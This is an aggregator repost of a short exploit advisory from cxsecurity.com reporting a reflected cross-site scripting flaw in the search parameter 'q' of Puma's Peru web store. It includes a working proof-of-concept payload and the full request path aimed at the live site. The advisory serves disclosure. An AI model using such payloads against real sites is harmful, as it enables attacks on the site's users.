Puma Peru - Reflected Cross-Site Scripting (XSS)
2024-8-28 04:14:25 Author: cxsecurity.com(查看原文) 阅读量:2 收藏
2024-8-28 04:14:25 Author: cxsecurity.com(查看原文) 阅读量:2 收藏
# Exploit Title: Puma Reflected XSS Vulnerability # Date: 2024-08-23 # Exploit Author: kerem24 # Vendor: pe.puma.com # Tested on: Microsoft Windows 11 Pro # CVE: N/A #PoC: An attacker just needs to find the vulnerable parameter (q=) and inject the JS code like: </script><script>alert(document.domain)</script> # Payload /pe/es/search?originalphrase=1&q=</script><script>alert(document.domain)</script>
文章来源: https://cxsecurity.com/issue/WLB-2024080039
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh